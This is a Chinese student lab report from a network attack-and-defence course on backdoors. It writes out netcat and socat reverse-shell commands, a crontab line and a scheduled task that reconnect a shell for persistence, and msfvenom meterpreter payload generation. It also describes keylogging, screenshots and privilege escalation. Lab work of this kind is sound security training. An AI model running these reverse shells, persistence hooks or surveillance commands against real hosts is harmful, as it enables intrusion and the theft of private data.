20145206 邹京儒 《网络攻防》 后门原理与实践
一、实践过程记录
使用netcat获取主机操作Shell,cron启动
1、linux获取windows的shell:
从码云上下载ncat.rar(kali中已经自带):
用ifconfig获取Kali的ip:
在kali下使用nc -l -p 5206来将5206设置成监听端口开始监听:
windows下输入netcat.exe -e cmd 10.1.1.140 5206实现kali对windowsshell的控制:
2、windows获取linux的shell:
利用ipconfig获取主机ip 10.1.1.162:
windows使用c:\你的nc的目录路径>ncat.exe -l -p 5206命令于5206端口进行监听。
linux使用nc win的IP 5206 -e /bin/sh命令通过5206端口反弹连接windows主机
随后,我们在windows主机下就获得了linux的shell,可以运行linux下的指令并获取linux主机的信息,如ls指令:
3、ncat传输文件:
由于我换了wifi,所以ip地址变了。。。
如图所示,先在windows中打开监听,然后在linux系统中发送文件:
传输的文件查看:
4、用crontab -e指令编辑一条定时任务,在最后一行添加02 * * * * /bin/netcat 172.20.10.3 5206 -e /bin/sh,意思是在每个小时的第02分钟反向连接Windows主机的5206端口
当时间到了02分时,此时已经获得了Kali的shell,可以输入指令
使用socat获取主机操作Shell, 任务计划启动
1、以linux利用socat获取windows的shell为例
在Linux的终端上使用socat - tcp:win的IP:5206命令监听5206端口:
win在命令行下使用socat tcp-listen:5206 exec:cmd,pty,stderr命令在5206端口反弹连接Linux
随即,Linux获得了win的shell:
2、任务计划启动
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5206 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5206,同时把cmd.exe的stderr重定向到stdout上:
使用MSF meterpreter生成可执行文件,利用ncat传送文件到主机并运行获取主机Shell
在Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=35206 -f exe >fool3.exe命令生成一个名为fool3.exe的后门程序:
使用netcat将这个后门程序传送到Win主机:
在win的命令行下使用ncat.exe -lv 35206 > fool3.exe命令进行监听
随后在Linux下使用ncat -nv 172.30.6.174 35206 < fool3.exe命令把文件传送过去
开启MSF监听进程
双击运行win下的fool3.exe:
Linux就可以获得win的shell,进行远程控制了。
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
sysinfo查看系统版本信息:
screenshot直接对靶机屏幕截图:
键盘记录内容:keyscan_start命令开始捕捉键盘记录;keyscan_dump命令停止键盘记录的捕捉并显示出来键盘的记录
在靶机安装一些系统服务
getsystem为提权命令,可以获取私人权限
二、基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
可能操作系统自带后门,用户不知情,但开发方可以方便自己的权限。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
也许是在计算机上点击运行某个程序时,就会开启后门。
(3)Meterpreter有哪些给你映像深刻的功能?
可以捕获被攻击主机的屏幕和摄像头,在实验中实现了一下,觉得确实震撼到了我!
还有提权功能,看了其他同学的博客,好像win8不行,但我是win7~
(4)如何发现自己有系统有没有被安装后门?
有些拥有反向连接的后门可以用dos命令检测:这类后门一般会监听某个指定断口,要检查这类后门需要用到dos命令在没有打开任何网络连接页面和防火墙的情况下输入netstat -an 监听本地开放端口,看是否有本地ip连接外网ip。
三、实验总结与体会
通过本次实验,我了解了一些关于后门的相关知识,觉得其实后门挺可怕的,尤其是可以获取到被攻击主机的摄像头、屏幕、键盘时,可能某些个人隐私就会暴露!!!还有,本人使用的是win7,但听说使用win8,win10的朋友们在植入后门时都不同程度地受到了阻挠。。。然而win7好像并没有。。。我有点怀疑win7是不是有点弱smile~
